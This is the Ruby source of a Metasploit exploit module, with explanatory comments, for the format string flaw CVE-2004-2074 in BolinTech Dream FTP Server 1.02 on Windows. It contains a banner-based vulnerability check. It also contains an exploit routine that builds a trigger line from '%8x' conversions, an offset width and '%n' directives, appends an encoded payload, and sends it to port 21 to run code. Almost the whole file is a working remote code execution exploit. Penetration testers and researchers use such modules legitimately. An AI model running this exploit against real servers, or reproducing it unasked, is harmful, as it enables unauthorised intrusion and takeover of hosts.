Path: blob/master/modules/exploits/windows/ftp/dreamftp_format.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote exploit module for the BolinTech Dream FTP Server 1.02 format
# string vulnerability (CVE-2004-2074). The module talks plain TCP to the
# FTP port (default 21) via Msf::Exploit::Remote::Tcp; it does not use the
# FTP mixin, so no USER/PASS exchange takes place before the trigger is sent.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the single RPORT option.
  #
  # Notable constraints declared here:
  # * Payload space is capped at 1000 bytes and NUL/CR/LF are bad chars,
  #   because the trigger is sent as one CRLF-terminated line.
  # * The only target is a "universal" one carrying an 'Offset' value that
  #   is spliced into the format string by #exploit.
  # * Reliability, Stability and SideEffects are all declared UNKNOWN_*,
  #   so nothing about crash behaviour of the service is asserted.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BolinTech Dream FTP Server 1.02 Format String',
        'Description' => %q{
          This module exploits a format string overflow in the BolinTech
          Dream FTP Server version 1.02. Based on the exploit by SkyLined.
        },
        'Author' => [ 'aushack' ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-2074'],
          [ 'OSVDB', '4986'],
          [ 'BID', '9800'],
          [ 'EDB', '823']
        ],
        'Platform' => ['win'],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Targets' => [
          # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
          [
            'Dream FTP Server v1.02 Universal',
            {
              # Decimal value used as the width of the '%d' conversion in
              # #exploit; the hex expression is the original derivation.
              'Offset' => 3957680, # 0x3c63ff-0x4f
            }
          ],
        ],
        'DisclosureDate' => '2004-03-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(21),
      ]
    )
  end

  # Banner-based vulnerability check.
  #
  # Connects, reads a single chunk from the socket and disconnects again.
  # `banner.to_s` tolerates `get_once` returning nil (no data / closed
  # socket), in which case the regex simply does not match.
  #
  # Only the product name is matched; no version string is inspected, which
  # is why the positive result is CheckCode::Detected rather than a
  # stronger verdict. Everything else, including an empty banner, is
  # reported as CheckCode::Safe.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    connect
    banner = sock.get_once
    disconnect
    if (banner.to_s =~ /Dream FTP Server/)
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  # Sends the format string trigger and the encoded payload as one line.
  #
  # Layout of the line that is written to the socket, in order:
  # 1. a two-byte prefix "\xeb\x29";
  # 2. eight "%8x" conversions, then a "%d" whose field width is the
  #    target's 'Offset' value, followed by two "%n" directives;
  # 3. eight "@" bytes and then `payload.encoded` (bounded by the
  #    'Space'/'BadChars' declared in #initialize);
  # 4. a trailing CRLF.
  #
  # `select(nil, nil, nil, 0.25)` is Kernel#select with only a timeout,
  # i.e. a 250 ms pause, used once after connecting and once after sending.
  # `handler` runs before `disconnect`, so the session handler is given a
  # chance to pick up a connection while the socket is still open.
  def exploit
    connect
    select(nil, nil, nil, 0.25)
    sploit = "\xeb\x29"
    sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
    sploit << "@@@@@@@@" + payload.encoded
    sock.put(sploit + "\r\n")
    select(nil, nil, nil, 0.25)
    handler
    disconnect
  end
end